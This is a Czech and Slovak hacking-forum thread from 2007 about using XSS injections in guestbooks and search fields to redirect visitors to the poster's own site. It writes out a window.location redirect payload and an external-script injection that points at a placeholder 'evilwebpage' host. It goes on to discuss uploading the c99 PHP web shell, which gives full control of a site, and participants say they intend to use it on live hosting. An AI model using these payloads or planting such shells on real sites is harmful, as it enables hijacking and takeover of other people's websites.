XSS- zajimavy ucinek

HackForum

XSS- zajimavy ucinek#
Tak jsem se rozhodl ze otkousim XSS utok na propagovani svych stranek- presmerovanim na ne. Nutno rict ze se to povedlo, akorat misto presmerovani se kdzy kliknu na hlavni stranku presmeruje na vzkaznik kde neni zadny prispevek..cim to je?
(odpovědět)
3zeeboom | 85.13.78.*7.4.2007 19:02
re: XSS- zajimavy ucinek#
ehm, málo informací. Jak to přesměrováváš? přes JS?

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website7.4.2007 19:22
re: XSS- zajimavy ucinek#
Teda spíš na jeké webovce. Jestli zadáš do location celou adresu, přesměruje se to na ní. Ehm, jakej vzkazník

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website7.4.2007 19:22
re: XSS- zajimavy ucinek#
kua normalni vzkaznik guestbook kokotknzika... a ne pre js ale <script src="adrsa"></script>
(odpovědět)
3zeeboom | 85.13.78.*7.4.2007 19:52
re: XSS- zajimavy ucinek#
Nevím co řešíš jakýma vzkazníkama. Normálně tam vlož <script>
window.location.href="[link]";
</script> [link]

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website7.4.2007 20:02
re: XSS- zajimavy ucinek#
... ano to plati pro vyhledavace ale podobnym zpusobem se daji hackovat i vzkazniky- [link]
(odpovědět)
3zeeboom | 85.13.78.*7.4.2007 20:53
re: XSS- zajimavy ucinek#
Tak to dopada kdyz se lide neco "nauci" tim zpusobem ze si jen okopiruji kody... Na fora nebo diskuze se provadi utoky typu Perzistance(trvale) XSS nebo Embedded Scripting, tzn. ze server takovy retezec ulozi a pri opetovnem nacteni ho zpracuje(v pripade JS ho zpracovava browser).. Pokud pouze modifikujeme URL a nedochazi k ulozeni retezce serverem pak se jedna o Non-perzistance XSS, kterych se vyuziva treba u odkazu.. V realu se casteji vyuzivat odkazani na externi skript <script src=http://evilwebpage/evilscript.js><
;/script>

Diky tomu nemusi clovek resit problemy s escapovanymi znaky(i kdyz to neni docela pravda)
(odpovědět)
XYZ | 68.81.151.*9.4.2007 15:51
re: XSS- zajimavy ucinek#
Trochu OT ale na můj web [link] někdo útočil s tímto [link] pokud by někoho zajímal exploit.

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website9.4.2007 17:40
re: XSS- zajimavy ucinek#
to akoze dal tomu .js a nahral ti to tam? a co to vobec robi?
(odpovědět)
assf | 87.197.179.*9.4.2007 18:24
re: XSS- zajimavy ucinek#
assf: tohle je php script, který se nahraje na web... a máš k úplnou kontrolu nad ním

----------
Get enlightened!
(odpovědět)
mr.Crow | E-mail | Website9.4.2007 19:16
re: XSS- zajimavy ucinek#
hej jasne to vidis na zacitaku scriptu o aky jazyk sa tam jedna... A co presne robi tento script v pripade, ze by som ho nahral na web? dik
(odpovědět)
mika | 87.197.179.*9.4.2007 20:52
re: XSS- zajimavy ucinek#
mika: to vyzkoušej ;-) po spuštění máš hezký adminský rozhraní, můžeš mazat / upravovat / přidávat soubory...

----------
Get enlightened!
(odpovědět)
mr.Crow | E-mail | Website9.4.2007 21:21
re: XSS- zajimavy ucinek#
no vyzera to tak, ze si to skutocne skusim.. :) dam potom vediet... :D
(odpovědět)
mika | 87.197.179.*9.4.2007 22:54
re: XSS- zajimavy ucinek#
jo jasne tak som si to upol vyzera to pekne... zajtra idem na ostro...
(odpovědět)
mika | 87.197.179.*9.4.2007 23:09
re: XSS- zajimavy ucinek#
MZK: Nejedna se o exploit, ale o shell a to je sakra rozdil.

mr.Crow: Mazat/upravovat/pridavat soubory?? To je ta nejposlednejsi fce, kterou C99 ma.
(odpovědět)
XYZ | 128.197.11.*10.4.2007 11:33
re: XSS- zajimavy ucinek#
Nevím, skript mi hází chybu na 209. Warning: Invalid argument supplied for foreach() in C:\Program Files\xampp\htdocs\c99shell.txt on line 209
c99shell: Access Denied - your host (127.0.0.1) not allow


----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website12.4.2007 1:35
re: XSS- zajimavy ucinek#
ja som to spustil na ____.hostuju.cz v pohode...
(odpovědět)
asdnj | 87.197.152.*12.4.2007 15:47
re: XSS- zajimavy ucinek#
asdnj: Zkoušel jsem to na localhostu.. Tak to hodím nějak ven a uvidím.

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website13.4.2007 9:20

Zpět
 
 
 

 
BBCode